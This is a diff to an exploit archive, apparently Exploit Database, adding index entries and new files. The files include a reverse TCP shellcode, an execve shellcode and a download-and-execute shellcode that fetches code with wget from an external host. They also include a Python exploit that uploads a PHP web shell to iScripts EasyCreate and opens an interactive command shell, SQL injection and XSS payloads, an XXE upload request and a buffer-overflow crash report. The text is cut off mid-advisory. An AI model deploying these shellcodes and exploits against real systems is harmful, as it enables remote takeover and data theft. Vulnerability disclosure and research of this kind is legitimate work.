diff --git a/files.csv b/files.csv
index fffeae115..c6a7552e8 100755
--- a/files.csv
+++ b/files.csv
@@ -32489,6 +32489,7 @@ id,file,description,date,author,platform,type,port
36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site 'ty' Parameter SQL Injection Vulnerability",2011-08-08,darkTR,php,webapps,0
36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server <= 4.0.2 NULL Pointer Dereference Remote Denial of Service Vulnerability",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0
36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0
+39386,platforms/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",php,webapps,80
36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure Vulnerability",2015-02-10,"Yakir Wizman",hardware,webapps,0
36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart - Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80
36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0
@@ -35625,3 +35626,13 @@ id,file,description,date,author,platform,type,port
39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0
39383,platforms/lin_x86-64/shellcode/39383.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80
+39387,platforms/php/webapps/39387.py,"iScripts EasyCreate 3.0 - Remote Code Execution Exploit",2016-02-01,"Bikramaditya Guha",php,webapps,80
+39388,platforms/lin_x86-64/shellcode/39388.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version v2",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
+39389,platforms/lin_x86/shellcode/39389.c,"Linux x86 Download & Execute Shellcode",2016-02-01,B3mB4m,lin_x86,shellcode,0
+39390,platforms/lin_x86-64/shellcode/39390.c,"x86_64 Linux Polymorphic Execve-Stack - 47 bytes",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
+39391,platforms/java/webapps/39391.txt,"Hippo CMS 10.1 - Multiple Vulnerabilities",2016-02-01,LiquidWorm,java,webapps,80
+39393,platforms/windows/dos/39393.txt,"Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution",2016-02-01,LiquidWorm,windows,dos,0
+39395,platforms/windows/dos/39395.txt,"WPS Office < 2016 - .ppt Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
+39396,platforms/windows/dos/39396.txt,"WPS Office < 2016 - .doc OneTableDocumentStream Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
+39397,platforms/windows/dos/39397.txt,"WPS Office < 2016 - .ppt drawingContainer Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
+39398,platforms/windows/dos/39398.txt,"WPS Office < 2016 - .xls Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
diff --git a/platforms/java/webapps/39391.txt b/platforms/java/webapps/39391.txt
new file mode 100755
index 000000000..eb9785be0
--- /dev/null
+++ b/platforms/java/webapps/39391.txt
@@ -0,0 +1,179 @@
+
+Hippo CMS 10.1 XML External Entity Information Disclosure Vulnerability
+
+
+Vendor: Hippo B.V.
+Product web page: http://www.onehippo.org
+Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)
+
+Summary: Hippo CMS is an open source Java CMS. We built it so you
+can easily integrate it into your existing architecture.
+
+Desc: XXE (XML External Entity) processing through upload of SVG
+images in the CMS, and through XML import in the CMS Console application.
+
+Tested on: Linux 2.6.32-5-xen-amd64
+ Java/1.8.0_66
+ Apache-Coyote/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5301
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5301.php
+
+Vendor: http://www.onehippo.org/security-issues-list/security-12.html
+ http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html
+
+
+04.12.2015
+
+---
+
+
+[Request]:
+
+
+POST /?1-8.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center-tabs-panel~container-cards-3-panel-editor-extension.editor-form-template-view-3-item-view-1-item-extension.upload-fileUpload-form-fileUpload HTTP/1.1
+Host: 10.0.2.17
+User-Agent: ZSL_Web_Scanner/2.8
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: https://10.0.2.17/?1&path=/content/gallery/test4.svg
+Content-Length: 2101
+Content-Type: multipart/form-data; boundary=---------------------------20443294602274
+Cookie: [OMMITED]
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="id1a0_hf_0"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:1:item
+:view:1:item:value:widget"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
+:view:1:item:view:1:item:view:1:item:value:widget"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
+:view:1:item:view:2:item:view:1:item:value:widget"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
+:view:1:item:view:1:item:value:widget"
+
+asd
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
+:view:2:item:view:1:item:value:widget"
+
+hhh
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
+:view:3:item:view:1:item:panel:editor"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
+:view:2:item:view:1:item:value:widget"
+
+hhh
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
+:view:3:item:view:1:item:value:widget"
+
+hhhh
+-----------------------------20443294602274
+Content-Disposition: form-data; name="files[]"; filename="svgupload2.svg"
+Content-Type: image/svg+xml
+
+ ]
+>
+-----------------------------20443294602274--
+
+
+
+[Response]:
+
+
+
+
+###############################################################################
+
+
+
+
+
+
+
+
+
diff --git a/platforms/lin_x86-64/shellcode/39388.c b/platforms/lin_x86-64/shellcode/39388.c
new file mode 100755
index 000000000..ee020bfd8
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39388.c
@@ -0,0 +1,113 @@
+/*---------------------------------------------------------------------------------------------------------------------
+/*
+*Title: tcp reverse shell with password polymorphic version v2 135 bytes
+*Author: Sathish kumar
+*Contact: https://www.linkedin.com/in/sathish94
+*Copyright: (c) 2016 iQube. (http://iQube.io)
+*Release Date: January 29, 2016
+*Description: x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
+*Tested On: Ubuntu 14.04 LTS
+*SLAE64-1408
+*Build/Run: gcc -fno-stack-protector -z execstack filename.c -o filename
+* ./bindshell
+* nc -l 4444 -vvv
+*
+
+global _start
+
+_start:
+
+ xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
+ xor rsi, rsi
+ mul rsi
+ push byte 0x2 ;pusing argument to the stack
+ pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
+ inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
+ push byte 0x29 ; pushing the syscall number into the rax by using stack
+ pop rax
+ syscall
+
+ ; copying the socket descripter from rax to rdi register so that we can use it further
+
+ xchg rax, rdi
+
+ ; server.sin_family = AF_INET
+ ; server.sin_port = htons(PORT)
+ ; server.sin_addr.s_addr = INADDR_ANY
+ ; bzero(&server.sin_zero, 8)
+ ; setting up the data sctructure
+
+ xor rax, rax
+ push rax ; bzero(&server.sin_zero, 8)
+ mov ebx , 0xfeffff80 ; ip address 127.0.0.1 "noted" to remove null
+ not ebx
+ mov dword [rsp-4], ebx
+ sub rsp , 4 ; adjust the stack
+ xor r9, r9
+ push word 0x5c11 ; port 4444 in network byte order
+ push word 0x02 ; AF_INET
+ push rsp
+ pop rsi
+
+
+ push 0x10
+ pop rdx
+ push 0x2a
+ pop rax
+ syscall
+
+ push 0x3
+ pop rsi ; setting argument to 3
+
+
+
+duplicate:
+ dec esi
+ mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
+ syscall
+ jne duplicate
+
+password_check:
+
+ push rsp
+ pop rsi
+ xor rax, rax ; system read syscall value is 0 so rax is set to 0
+ syscall
+ push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
+ pop rax
+ lea rdi, [rel rsi]
+ scasd ; comparing the user input and stored password in the stack
+
+
+execve:
+ xor esi, esi
+ xor r15, r15
+ mov r15w, 0x161f
+ sub r15w, 0x1110
+ push r15
+ mov r15, rsp
+ mov rdi, 0xff978cd091969dd0
+ inc rdi
+ neg rdi
+ mul esi
+ add al, 0x3b
+ push rdi
+ push rsp
+ pop rdi
+ call r15
+
+
+*/
+#include
+#include
+
+unsigned char code[] =\
+"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb\x80\xff\xff\xfe\xf7\xd3\x89\x5c\x24\xfc\x48\x83\xec\x04\x4d\x31\xc9\x66\x68\x11\x5c\x66\x6a\x02\x54\x5e\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x54\x5e\x48\x31\xc0\x0f\x05\x68\x68\x61\x63\x6b\x58\x48\x8d\x3e\xaf\x31\xf6\x4d\x31\xff\x66\x41\xbf\x1f\x16\x66\x41\x81\xef\x10\x11\x41\x57\x49\x89\xe7\x48\xbf\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xff\xc7\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x41\xff\xd7";
+
+main()
+{
+ printf("Shellcode Length: %d\n", (int)strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
+
diff --git a/platforms/lin_x86-64/shellcode/39390.c b/platforms/lin_x86-64/shellcode/39390.c
new file mode 100755
index 000000000..3259cd59c
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39390.c
@@ -0,0 +1,52 @@
+/*---------------------------------------------------------------------------------------------------------------------
+/*
+*Title: x86_64 linux Polymorphic execve-stack 47 bytes
+*Author: Sathish kumar
+*Contact: https://www.linkedin.com/in/sathish94
+* Copyright: (c) 2016 iQube. (http://iQube.io)
+* Release Date: January 6, 2016
+*Description: X86_64 linux Polymorphic execve-stack 47 bytes
+*Tested On: Ubuntu 14.04 LTS
+*SLAE64-1408
+*Build/Run: gcc -fno-stack-protector -z execstack sellcode.c -o shellcode
+* ./shellcode
+*
+global _start
+
+_start:
+
+ xor esi, esi
+ xor r15, r15
+ mov r15w, 0x161f
+ sub r15w, 0x1110
+ push r15
+ mov r15, rsp
+ mov rdi, 0xff978cd091969dd0
+ inc rdi
+ neg rdi
+ mul esi
+ add al, 0x3b
+ push rdi
+ push rsp
+ pop rdi
+ call r15
+*/
+
+
+#include
+#include
+
+unsigned char code[] = \
+"\x31\xf6\x4d\x31\xff\x66\x41\xbf\x1f\x16\x66\x41\x81\xef\x10\x11\x41\x57\x49\x89\xe7\x48\xbf\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xff\xc7\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x41\xff\xd7";
+main()
+{
+
+ printf("Shellcode Length: %d\n", (int)strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
+
+
diff --git a/platforms/lin_x86/shellcode/39389.c b/platforms/lin_x86/shellcode/39389.c
new file mode 100755
index 000000000..7b99ed1d7
--- /dev/null
+++ b/platforms/lin_x86/shellcode/39389.c
@@ -0,0 +1,99 @@
+/*
+--------------------------------------------------------------------------------------------------------
+
+[+] Author : B3mB4m
+[~] Contact : b3mb4m@protonmail.com
+[~] Project : https://github.com/b3mb4m/Shellsploit
+[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
+[~] Poc : http://imgur.com/hHB4yiQ
+
+
+#We are still working on ROP Chain, stay tuned :)
+
+
+"""
+You can convert it an elf file:
+
+https://www.virustotal.com/en/file/93c214f7b4362937f05f5732ba2f7f1db53e2a5775ab7bafdba954e691f74c82/analysis/1454113925/
+
+If you want test:
+ Important : your filename len must be one byte(Weird bug I'll fix it
+soon lol).
+ Default settings for http://b3mb4m.github.io/exec/h
+ Source codes : b3mb4m.github.io/exec/hello.asm
+"""
+
+
+
+00000000 31C0 xor eax,eax
+00000002 B002 mov al,0x2
+00000004 CD80 int 0x80
+00000006 31DB xor ebx,ebx
+00000008 39D8 cmp eax,ebx
+0000000A 743B jz 0x47
+0000000C 31C9 xor ecx,ecx
+0000000E 31DB xor ebx,ebx
+00000010 31C0 xor eax,eax
+00000012 6A05 push byte +0x5
+00000014 89E1 mov ecx,esp
+00000016 89E1 mov ecx,esp
+00000018 89E3 mov ebx,esp
+0000001A B0A2 mov al,0xa2
+0000001C CD80 int 0x80
+0000001E 31C9 xor ecx,ecx
+00000020 31C0 xor eax,eax
+00000022 50 push eax
+00000023 B00F mov al,0xf
+00000025 6A68 push byte +0x68
+00000027 89E3 mov ebx,esp
+00000029 31C9 xor ecx,ecx
+0000002B 66B9FF01 mov cx,0x1ff
+0000002F CD80 int 0x80
+00000031 31C0 xor eax,eax
+00000033 50 push eax
+00000034 6A68 push byte +0x68
+00000036 89E3 mov ebx,esp
+00000038 50 push eax
+00000039 89E2 mov edx,esp
+0000003B 53 push ebx
+0000003C 89E1 mov ecx,esp
+0000003E B00B mov al,0xb
+00000040 CD80 int 0x80
+00000042 31C0 xor eax,eax
+00000044 40 inc eax
+00000045 CD80 int 0x80
+00000047 6A0B push byte +0xb
+00000049 58 pop eax
+0000004A 99 cdq
+0000004B 52 push edx
+0000004C 6865632F68 push dword 0x682f6365
+00000051 682F2F6578 push dword 0x78652f2f
+00000056 68622E696F push dword 0x6f692e62
+0000005B 6869746875 push dword 0x75687469
+00000060 68346D2E67 push dword 0x672e6d34
+00000065 6862336D62 push dword 0x626d3362
+0000006A 89E1 mov ecx,esp
+0000006C 52 push edx
+0000006D 6A74 push byte +0x74
+0000006F 682F776765 push dword 0x6567772f
+00000074 682F62696E push dword 0x6e69622f
+00000079 682F757372 push dword 0x7273752f
+0000007E 89E3 mov ebx,esp
+00000080 52 push edx
+00000081 51 push ecx
+00000082 53 push ebx
+00000083 89E1 mov ecx,esp
+00000085 CD80 int 0x80
+*/
+
+//Project : https://github.com/b3mb4m/Shellsploit
+//This file created with shellsploit ..
+//30/01/2016 - 02:59:21
+//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
+
+unsigned char shellcode[] =
+"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31\xc0\x50\xb0\x0f\x6a\x68\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50\x6a\x68\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52\x68\x65\x63\x2f\x68\x68\x2f\x2f\x65\x78\x68\x62\x2e\x69\x6f\x68\x69\x74\x68\x75\x68\x34\x6d\x2e\x67\x68\x62\x33\x6d\x62\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
+
+int main(void){
+ (*(void(*)()) shellcode)();
+}
diff --git a/platforms/php/webapps/39386.txt b/platforms/php/webapps/39386.txt
new file mode 100755
index 000000000..46ce0e09f
--- /dev/null
+++ b/platforms/php/webapps/39386.txt
@@ -0,0 +1,143 @@
+iScripts EasyCreate 3.0 Multiple Vulnerabilities
+
+
+[Vendor Product Description]
+
+- iScripts EasyCreate is a private label online website builder. This software allows you to start an
+online business by offering website building services to your customers. Equipped with drag and drop
+design functionality, crisp templates and social sharing capabilities, this online website builder
+software will allow you to provide the best website building features to your users.
+
+
+- Site: http://www.iscripts.com
+
+
+[Advisory Timeline]
+
+[17.11.2015] First contact to vendor.
+[08.12.2015] Follow up with vendor. No response received.
+[08.12.2015] Ticket Created using online portal (id #010248399110346).
+[08.12.2015] Ticket closed by vendor without requesting vulnerability details.
+[28.12.2015] Vendor responds asking more details.
+[29.12.2015] Sent details to the vendor.
+[05.01.2016] Follow up with vendor. No response received.
+[14.01.2016] Follow up with vendor. No response received.
+[28.01.2016] Public Security advisory released.
+
+
+[Bug Summary]
+
+- SQL Injection
+
+- Cross Site Scripting (Stored)
+
+- Cross Site Scripting (Reflected)
+
+- Cross Site Request Forgery
+
+
+[Impact]
+
+- High
+
+
+[Affected Version]
+
+- EasyCreate 3.0
+
+
+[Advisory]
+
+- ZSL-2016-5298
+- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5298.php
+
+
+[Bug Description and Proof of Concept]
+
+1. Cross-Site Request Forgery (CSRF) - The application allows users to perform certain actions via HTTP requests
+without performing any validity checks to verify the requests. This can be exploited to perform certain actions
+with administrative privileges if a logged-in user visits a malicious web site
+https://en.wikipedia.org/wiki/Cross-site_request_forgery
+
+2. Cross Site Scripting (XSS) - Multiple cross-site scripting vulnerabilities were also discovered. The issue is
+triggered when input passed via multiple parameters is not properly sanitized before being returned to the user.
+This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
+https://en.wikipedia.org/wiki/Cross-site_scripting
+
+3. SQL Injection - iScripts EasyCreate suffers from a SQL Injection vulnerability. Input passed via a GET
+parameter is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited
+to manipulate SQL queries by injecting arbitrary SQL code.
+https://en.wikipedia.org/wiki/SQL_injection
+
+
+
+[Proof-of-Concept]
+
+1. SQL Injection
+
+Parameter:
+siteid (GET)
+
+Payload:
+action=editsite&siteid=6 AND (SELECT 3405 FROM(SELECT COUNT(*),CONCAT(0x71716b6a71,(SELECT (ELT(3405=3405,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+2. Multiple Stored Cross Site Scripting
+
+Parameter:
+siteName (POST)
+
+Payload:
+Content-Disposition: form-data; name="siteName"
+
+
+
+Parameter:
+selectedimage (POST)
+
+Payload:
+selectedimage=
+
+Parameter:
+filename (POST)
+
+Payload:
+filename=
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+3. Multiple Reflected Cross Site Scripting
+
+Parameter
+catid (GET)
+
+Parameters
+selectedimage, description, keywords, robotans, refreshans, authorans, copyrightans, revisitans, cmbSearchType (POST)
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+4. Multiple Cross Site Request Forgery (CSRF)
+
+Sample Payload for editing profile:
+
+
+
+
+
+
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+All flaws described here were discovered and researched by:
+
+Bikramaditya Guha aka "PhoenixX"
\ No newline at end of file
diff --git a/platforms/php/webapps/39387.py b/platforms/php/webapps/39387.py
new file mode 100755
index 000000000..617a99ed7
--- /dev/null
+++ b/platforms/php/webapps/39387.py
@@ -0,0 +1,217 @@
+#!C:/Python27/python.exe -u
+#
+#
+# iScripts EasyCreate 3.0 Remote Code Execution Exploit
+#
+#
+# Vendor: iScripts.com
+# Product web page: http://www.iscripts.com
+# Affected version: 3.0
+#
+# Summary: iScripts EasyCreate is a private label online website builder. This
+# software allows you to start an online business by offering website building
+# services to your customers. Equipped with drag and drop design functionality,
+# crisp templates and social sharing capabilities, this online website builder
+# software will allow you to provide the best website building features to your
+# users.
+#
+# Desc: iScripts EasyCreate suffers from an authenticated arbitrary PHP code
+# execution. The vulnerability is caused due to the improper verification of
+# uploaded files in '/ajax_image_upload.php' script thru the 'userImages' POST
+# parameter. This can be exploited to execute arbitrary PHP code by uploading
+# a malicious PHP script file with '.php4' extension (to bypass the '.htaccess'
+# block rule) that will be stored in '/uploads/siteimages/thumb/' directory.
+#
+# Tested on: Apache
+# MySQL 5.5.40
+#
+# Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
+#
+# Zero Science Lab - http://www.zeroscience.mk
+# Macedonian Information Security Research And Development Laboratory
+#
+#
+# Advisory ID: ZSL-2016-5297
+# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5297.php
+#
+#
+# 17.11.2015
+#
+#
+
+version = '3.0'
+
+import itertools, mimetools, mimetypes
+import cookielib, urllib, urllib2, sys
+import logging, os, time, datetime, re
+import requests, httplib
+
+from colorama import Fore, Back, Style, init
+from cStringIO import StringIO
+from urllib2 import URLError
+
+global file
+file = 'abcde2'
+
+init()
+
+if os.name == 'posix': os.system('clear')
+if os.name == 'nt': os.system('cls')
+piton = os.path.basename(sys.argv[0])
+
+def bannerche():
+ print '''
+ @-------------------------------------------------------------@
+ | iScripts EasyCreate 3.0 Remote Code Execution Exploit |
+ | ID: ZSL-2016-5297 |
+ | Copyleft (c) 2016, Zero Science Lab |
+ @-------------------------------------------------------------@
+ '''
+ if len(sys.argv) < 1:
+ print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' \n'
+ print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk\n'
+ sys.exit()
+
+bannerche()
+
+print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
+
+host = sys.argv[1]
+
+cj = cookielib.CookieJar()
+opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
+
+print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
+
+opener2.open('http://'+host+'/easycreate/demo/login.php')
+
+print '\x20\x20[*] Login please.'
+
+username = raw_input('\x20\x20[*] Enter username: ')
+password = raw_input('\x20\x20[*] Enter password: ')
+
+login_data = urllib.urlencode({
+ 'vuser_login' : username,
+ 'vuser_password' : password,
+ })
+
+login = opener2.open('http://'+host+'/easycreate/demo/login.php?act=post', login_data)
+auth = login.read()
+
+if re.search(r'Invalid username and', auth):
+ print '\x20\x20[*] Incorrect username or password '+'.'*24+Fore.RED+'[ER]'+Fore.RESET
+ print
+ sys.exit()
+else:
+ print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
+
+response = opener2.open('http://'+host+'/easycreate/demo/usermain.php?succ=msg')
+output = response.read()
+
+for session in cj:
+ sessid = session.name
+
+print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
+ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
+cookie = ses_chk.group(0)
+print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET
+
+class MultiPartForm(object):
+
+ def __init__(self):
+ self.form_fields = []
+ self.files = []
+ self.boundary = mimetools.choose_boundary()
+ return
+
+ def get_content_type(self):
+ return 'multipart/form-data; boundary=%s' % self.boundary
+
+ def add_field(self, name, value):
+ self.form_fields.append((name, value))
+ return
+
+ def add_file(self, field_name, filename, fileHandle, mimetype=None):
+ body = fileHandle.read()
+ if mimetype is None:
+ mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
+ self.files.append((field_name, filename, mimetype, body))
+ return
+
+ def __str__(self):
+
+ parts = []
+ part_boundary = '--' + self.boundary
+
+ parts.extend(
+ [ part_boundary,
+ 'Content-Disposition: form-data; name="%s"; filename="%s"' % \
+ (field_name, filename),
+ 'Content-Type: application/x-msdownload',
+ '',
+ body,
+ ]
+ for field_name, filename, content_type, body in self.files
+ )
+
+ parts.extend(
+ [ part_boundary,
+ 'Content-Disposition: form-data; name="%s"' % name,
+ '',
+ value,
+ ]
+ for name, value in self.form_fields
+ )
+
+ flattened = list(itertools.chain(*parts))
+ flattened.append('--' + self.boundary + '--')
+ flattened.append('')
+ return '\r\n'.join(flattened)
+
+if __name__ == '__main__':
+
+ form = MultiPartForm()
+ form.add_file('userImages', 'abcde2.php4',
+ fileHandle=StringIO(''))
+
+
+ request = urllib2.Request('http://'+host+'/easycreate/demo/ajax_image_upload.php')
+ request.add_header('User-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0')
+ request.add_header('Referer', 'http://'+host+'/easycreate/demo/gallerymanager.php')
+ request.add_header('Accept-Language', 'en-US,en;q=0.5')
+ body = str(form)
+ request.add_header('Content-type', form.get_content_type())
+ request.add_header('Connection', 'keep-alive')
+ request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')
+ request.add_header('Accept-Encoding', 'gzip, deflate')
+ request.add_header('Cookie', cookie)
+ request.add_header('Content-length', len(body))
+ request.add_data(body)
+ request.get_data()
+ urllib2.urlopen(request).read()
+ print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
+
+response = opener2.open('http://'+host+'/easycreate/demo/gallerymanager.php')
+output = response.read()
+
+for line in output.splitlines():
+ if file in line:
+ filename = str(line.split("=")[2:])[3:84]
+ print filename
+
+print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
+raw_input()
+while True:
+ try:
+ cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
+ execute = opener2.open(filename+'cmd='+cmd)
+ reverse = execute.read()
+ print reverse
+
+ if cmd.strip() == 'exit':
+ break
+
+ except Exception:
+ break
+
+sys.exit()
\ No newline at end of file
diff --git a/platforms/windows/dos/39393.txt b/platforms/windows/dos/39393.txt
new file mode 100755
index 000000000..217b864ae
--- /dev/null
+++ b/platforms/windows/dos/39393.txt
@@ -0,0 +1,84 @@
+
+Autonics DAQMaster 1.7.3 DQP Parsing Buffer Overflow Code Execution
+
+
+Vendor: Autonics Corporation
+Product web page: https://www.autonics.com
+Affected version: 1.7.3 (build 2454)
+ 1.7.0 (build 2333)
+ 1.5.0 (build 2117)
+
+Summary: DAQMaster is comprehensive device management program
+that can be used with Autonics thermometers, panel meters,
+pulse meters, and counters, etc and with Konics recorders,
+indicators. DAQMaster provides GUI control for easy and convenient
+management of parameters and multiple device data monitoring.
+
+Desc: The vulnerability is caused due to a boundary error in the
+processing of a project file, which can be exploited to cause a
+buffer overflow when a user opens e.g. a specially crafted .DQP
+project file with a large array of bytes inserted in the 'Description'
+element. Successful exploitation could allow execution of arbitrary
+code on the affected machine.
+
+---------------------------------------------------------------------
+
+(ee8.1ee8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=41414141 ebx=57010748 ecx=02bb9a00 edx=00808080 esi=00000001 edi=00000001
+eip=00405d45 esp=0018f59c ebp=0018f91c iopl=0 nv up ei pl nz na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
+DAQMaster!TClsValueListShowData$qqrp16GraphicsTBitmapip10TPropValuei+0x41d:
+00405d45 8b10 mov edx,dword ptr [eax] ds:002b:41414141=????????
+
+---------------------------------------------------------------------
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+ Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5302
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5302.php
+
+
+20.11.2015
+
+--
+
+
+thricer.dqp project PoC:
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39393.zip
+------------------------
+
+
+
+
+ Noname
+
+
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...[n]
+ C:\Users\zslab\Documents
+ 0
+
+ 0
+ 0
+
+ 0
+
+
+
+
+
+ DAQ WorkSpace
+
+
+
+
+
diff --git a/platforms/windows/dos/39395.txt b/platforms/windows/dos/39395.txt
new file mode 100755
index 000000000..8ad9627b7
--- /dev/null
+++ b/platforms/windows/dos/39395.txt
@@ -0,0 +1,71 @@
+#####################################################################################
+
+Application: WPS Office
+
+Platforms: Windows
+
+Versions: Version before 2016
+
+Author: Francis Provencher of COSIG
+
+Twitter: @COSIG_
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
+
